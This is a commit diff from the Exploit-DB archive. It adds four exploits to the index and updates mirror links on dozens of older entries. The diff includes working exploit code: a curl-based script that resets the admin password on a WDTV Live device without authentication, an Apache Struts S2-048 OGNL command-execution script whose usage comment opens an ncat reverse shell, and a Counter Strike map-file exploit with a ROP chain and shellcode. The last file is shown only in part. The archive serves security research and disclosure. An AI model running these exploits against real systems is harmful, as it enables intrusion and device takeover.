DB: 2017-07-15

4 new exploits

Counter Strike: Condition Zero - '.BSP' Map File Code Execution

Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)
WDTV Live SMP 2.03.20 - Remote Password Reset
This commit is contained in:
Offensive Security 2017-07-15 05:01:21 +00:00
parent 2f83b6c1be
commit 635e0e935f
51 changed files with 784 additions and 54 deletions

View file

@ -9132,6 +9132,7 @@ id,file,description,date,author,platform,type,port
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15693,6 +15694,7 @@ id,file,description,date,author,platform,type,port
42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38134,3 +38136,5 @@ id,file,description,date,author,platform,type,port
42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0

Can't render this file because it is too large.

View file

@ -1,6 +1,6 @@
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
http://zenthought.org/content/file/android-root-2009-08-16-source
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
# milw0rm.com [2009-08-18]

View file

@ -3,6 +3,9 @@ This exploit was leaked on the Full Disclosure mailing list:
http://seclists.org/fulldisclosure/2012/Jun/404
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
BSD telnetd Remote Root Exploit *ZERODAY*
By Kingcope
Year 2011
@ -48,6 +51,3 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
02:41:51 UTC 2011
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip

View file

@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
Root-Node
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse

View file

@ -0,0 +1,63 @@
#######################################################
## WDTV Live SMP Remote Password Reset Vulnerability ##
#######################################################
Date: Jul 14 2017
Author: sw1tch
Demo: https://www.sw1tch.net/2017/07/12/wdtv-live-smb-exploit/
Description: A simple remotely exploitable web application vulnerability
for the WDTV Live Streaming Media Player and possibly other WDTV systems.
-INTRO-
The WDTV Live SMP is a is a consumer device produced by Western Digital
that plays videos, images, and music from USB drives. It can play
high-definition video through an HDMI port, and standard video through
composite video cables. It can play most common video and audio formats. As
of August 2016, the WDTV appears to be discontinued.
The latest firmware version appears to be 2.03.20.
-VULNERABILITY-
The WDTV Live SMP runs an embedded webserver, allowing authenticated users
to upload themes, manage device settings, access a virtual remote and other
tasks. To authenticate, a user needs to provide the correct password (no
username).
An unauthenticated attacker can update the password via a constructed GET
request, subsequently taking control of many functions of the device.
Vulnerable versions include at least firmware 2.03.20, and likely many more
older versions.
-POC-
#!/bin/bash
echo
echo "WDTV Live SMP Admin Password Reset Exploit"
echo "Apparently sw1tch found this guff in 2017"
echo
if [ $# != 2 ]; then
echo "Usage: `basename $0` <target IP/host> <new password>"
echo
exit $ERR_ARG
fi
# Vars...
target=$1
password=$2
echo -n "[*] Slamming your chosen password at $target now..."
curl "http://$target/DB/modfiy_pw.php" -d "password=$password"
echo "done!"
echo "[*] Try logging in to http://$target/ using $password"
echo
exit 0
-FIX-
None available. Device appears to be EOL so unlikely to be remediated.
--------------------------------------------------------------------------------------------------------------------------------

View file

@ -1,5 +1,5 @@
/*
EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------

View file

@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz

View file

@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)

View file

@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
...
$ strings strings-bfd-badptr2

View file

@ -9,6 +9,6 @@
# CVE : N/A
Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html

View file

@ -125,5 +125,5 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

View file

@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
*/
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
# milw0rm.com [2009-08-14]

View file

@ -4,6 +4,6 @@
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
# milw0rm.com [2009-08-14]

View file

@ -8,7 +8,7 @@
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------

View file

@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)

View file

@ -1,6 +1,6 @@
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
Author: RoMaNSoFt <roman@rs-labs.com>
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
# milw0rm.com [2007-11-02]

View file

@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)

View file

@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)

View file

@ -0,0 +1,51 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Just a demo for CVE-2017-9791
import requests
def exploit(url, cmd):
print("[+] command: %s" % cmd)
payload = "%{"
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
payload += "}"
data = {
"name": payload,
"age": 20,
"__checkbox_bustedBefore": "true",
"description": 1
}
headers = {
'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
}
requests.post(url, data=data, headers=headers)
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("python %s <url> <cmd>" % sys.argv[0])
sys.exit(0)
print('[*] exploit Apache Struts2 S2-048')
url = sys.argv[1]
cmd = sys.argv[2]
exploit(url, cmd)
# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"

View file

@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
---
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz

View file

@ -27,5 +27,5 @@ Test Environment:
====================================================================
Download the following file for more instructions and exploits:
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
====================================================================

View file

@ -22,5 +22,5 @@ Cheers!
# - A valid account as at least a user
# - The target to have outgoing internet connectivity
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz

View file

@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar

View file

@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)

View file

@ -19,7 +19,7 @@ DoS("DoS");
-------------------------
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
Regards

View file

@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable.
Proof of concept included.
http://www21.zippyshare.com/v/83302158/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar

View file

@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8:
Proof of concept included.
http://www42.zippyshare.com/v/23669551/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf

View file

@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable.
################################################################################
Proof of concept included.
http://www21.zippyshare.com/v/83302158/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip

View file

@ -65,6 +65,6 @@ User mode DEP access violations are exploitable.
################################################################################
Proof of concept included.
Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
http://www39.zippyshare.com/v/91522221/file.html
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar

View file

@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
176efdb4 000003e8
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs

View file

@ -1,4 +1,4 @@
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

View file

@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
4 . the otherside's yahoo! messenger will be crashed.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
# milw0rm.com [2007-08-29]

View file

@ -16,5 +16,5 @@
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)

View file

@ -149,4 +149,4 @@ stores in stack :D
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)

View file

@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
@w3bd3vil and @abh1sek
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
=================================================================

View file

@ -32,4 +32,4 @@ Trendmicro, CDC
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip

View file

@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
2 Select all the content in the editor
3 Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z

View file

@ -1,5 +1,5 @@
## Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
## EDB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
# Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

View file

@ -25,5 +25,5 @@ FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt

View file

@ -25,5 +25,5 @@ M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt

View file

@ -12,10 +12,10 @@ R136a1 / hfiref0x
## Compiled EXE:
### x86
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
### x64
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
Source Code:
https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip

View file

@ -14,4 +14,4 @@ http://theori.io/research/cve-2016-0189
3. Browse with a victim IE to `vbscript_bypass_pm.html`.
4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)
EDB-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip

237
platforms/windows/local/42325.py Executable file
View file

@ -0,0 +1,237 @@
#!/usr/bin/env python
# Counter Strike: Condition Zero BSP map exploit
# By @Digital_Cold Jun 11, 2017
#
# E-DB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42325.zip (bsp-exploit-source.zip)
#
from binascii import hexlify, unhexlify
from struct import pack, unpack
import math
import mmap
import logging
fmt = "[+] %(message)s"
logging.basicConfig(level=logging.INFO, format=fmt)
l = logging.getLogger("exploit")
# Specific to the file
INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int]
VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float]
NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash
# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
# SEH_OVERWRITE_OFF = 0x4126C
# Initial offset into the index buffer where the function to exploit resides
INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
# INDEX_BUFFER
# 0: 20
# 1: 10
# 2: 2 --> Vertex Buffer Indexes
# VERTEX BUFFER INDEXES
# 0: 1
# 1: 2
# 2: 4 --> Vertex Data
# VERTEX DATA
# 0: 1.23, 23423.0, 3453.3
# 1: 1.23, -9.0, 3453.3
# 2: 1.0, 1.0, 1.0
# 3: 1.0, 1.0, 1.0
# 4: 0.0, 1.0, 0.0
# Example:
# a = INDEX_BUFFER[2] ; a = 2
# b = VERTEX_BUFFER[a] ; b = 4
# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
def dw(x):
return pack("I", x)
def main():
target_file = "eip-minimized.bsp"
output_file = "exploit-gen.bsp"
print "GoldSource .BSP file corruptor"
print " by @Digital_Cold"
print
l.info("Corrupting target file %s" % target_file)
# Read in and memory map target file
fp = open(target_file, 'rb')
mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
fp.close()
VEC3_COUNT = 63
# then come Saved EBP and return address
start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
second_idx = VERTEX_BUFFER_INDEXES_OFF
vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
l.info("Writing to index buffer offset %08x...", start_idx)
l.info("Vertex buffer indexes start %08x", second_idx)
l.info("Vertex data at %08x", vertex_data_start)
data_buffer = []
for i in range(VEC3_COUNT):
for j in range(3):
data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
data_buffer.append("\x00\x00\x00\x00") # dont care
data_buffer.append("\x00\x00\x00\x00") # unk1
data_buffer.append("\x00\x00\x00\x00") # unk2
data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
data_buffer.append("\x00\x00\x00\x00") # EBP
data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe]
# XXX: bug in mona. This is a ptr to VirtualProtectEx!!
# 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll]
"""
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
"""
# START ROP CHAIN
# DEP disable ROP chain
# rop chain generated with mona.py - www.corelan.be
#
# useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
rop_gadgets = [
#0x3808A308, # INT3 # RETN [steamclient.dll]
0x38420ade, # POP EDX # RETN [steamclient.dll]
0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll]
0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
0x381ebdc1, # POP EBP # RETN [steamclient.dll]
0x381f98cd, # & jmp esp [steamclient.dll]
0x387885ac, # POP EBX # RETN [steamclient.dll]
0x00000001, # 0x00000001-> ebx
0x384251c9, # POP EDX # RETN [steamclient.dll]
0x00001000, # 0x00001000-> edx
0x387cd449, # POP ECX # RETN [steamclient.dll]
0x00000040, # 0x00000040-> ecx
0x386c57fe, # POP EDI # RETN [steamclient.dll]
0x385ca688, # RETN (ROP NOP) [steamclient.dll]
0x0140b00e, # POP EAX # RETN [hl.exe]
0x90909090, # nop
0x385c0d3e, # PUSHAD # RETN [steamclient.dll]
]
# Can be replaced with ANY shellcode desired...
# http://shell-storm.org/shellcode/files/shellcode-662.php
shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
"\x24\x20\x57\xFF\xD0"
shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
